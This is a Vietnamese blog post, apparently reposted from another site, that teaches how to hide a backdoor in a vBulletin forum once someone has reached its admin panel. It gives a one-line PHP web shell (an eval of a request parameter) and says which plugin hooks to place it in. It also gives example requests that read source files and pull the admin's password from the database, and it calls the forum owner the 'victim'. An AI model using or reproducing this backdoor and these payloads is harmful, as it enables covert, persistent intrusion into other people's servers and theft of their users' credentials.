J2TEAM Security: A must-have extension for Chrome users. Install now!

Chèn Backdoor vào VBB nhanh-gọn-nhẹ-hiệu quả

Chèn Backdoor vào VBB nhanh-gọn-nhẹ-hiệu quả | Juno_okyo's Blog
1 min read
Hello, hnay DuyK sẽ hướng dẫn các bạn cách chèn 1 “cửa sau” vào VBB nhanh-gọn-nhẹ-hiệu quả:
Khi bạn đã login vào được admincp của 1 forum vbb nào đó, bạn muốn để lại 1 “cửa sau” trên website này 1 cách kín đáo nhất ?

Okê, chỉ cần 1 dòng đơn giản:
eval($_REQUEST['dct']);
Đầu tiên bạn cần truy cập vào: Plugin & product manager => Plugin manager => Tìm đến 1 plugin bất kì => EDIT => chèn dòng trên vào vị trí hợp lý (Nếu không hiểu lắm về cấu trúc php thì bạn có thể chèn vào đầu hoặc cuối)
Bạn cần chú ý vào “HOOK” mà bạn chèn. Bạn nào hiểu phần này thì okê rồi. Còn nếu bạn nào chưa hiểu thì hãy chọn những kái nào có hook là:
ajax_start => Sau khi chèn chỉ việc truy cập /forum_path/ajax.php?dct=(Code php)
global_start (ko biết có nhớ lộn ko) => Sau khi chèn chỉ việc truy cập /forum_path/forum.php?dct=(Code php) — (Hoặc có thể run bất kì file php nào, vì chèn vào global mà)
……………..Blah blah……………..
Code php bạn có thể chèn truy vấn SQL, readfile….
Ví dụ
?dct=$duyk=readfile(‘includes/class_core.php’); echo $duyk; => view file class_core.php
?dct=$duyk=mysql_fetch_array(mysql_query(“select password from user where userid=1″)); echo $duyk['password'];
……………..
Demo:


Với việc chèn “Cửa hậu” nhỏ gọn như vậy nhưng rất hiệu quả :D Bằng cách này chúng ta có 1 cửa cho riêng mình để vào “nhà” của victim 1 cách lén lút nhất
Nguồn: DaiCa.info
Leader at J2TEAM. Website: https://j2team.dev/

Bạn có thể thích những bài đăng này

  • Medium là một trong những nguồn thông tin lớn hiện nay, tại đây có rất nhiều các bài viết chất lượng. Tuy nhiên, khi đọc các bài viết tiếng Việt trên Medium sẽ khá khó chịu khi mà …
  • Khoảng mấy tháng nay nếu bạn đọc các bài viết trên blog của JUNO_OKYO hẳn sẽ nhận ra là có thêm một nút Đọc bài viết ở đầu mỗi bài. Chỉ với một cái nút mới này thôi mà các bài …
  • J2TEAM Security là gì?J2TEAM Security là một phần mở rộng (extension) dành cho trình duyệt Google Chrome và các trình duyệt dựa trên Chromium như Microsoft Edge, Brave, Vivaldi, Op…
  • Nhân tiện có bạn hỏi cách làm trang chuyển tiếp khi click vào link cho Blogspot nên tớ viết bài hướng dẫn luôn vì tớ cũng mới làm trang như vậy cho blog này gần đây. Các bạn có…
  • Ngày nay, bạn có thể tìm một thư viện JS cho mọi tính năng mà bạn cần trong một trang web. Nhưng nhiều khi điều đó trở thành sự lạm dụng quá mức khi mà HTML cũng có thể làm đượ…
  • SMCC là cái gì? Mấy năm trước trong một lần đi tham dự sự kiện với mấy anh em cùng công ty, tớ vô tình nghe được bài nói của anh Lê Công Thành – CEO của InfoRe về chủ đề xử lý d…

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!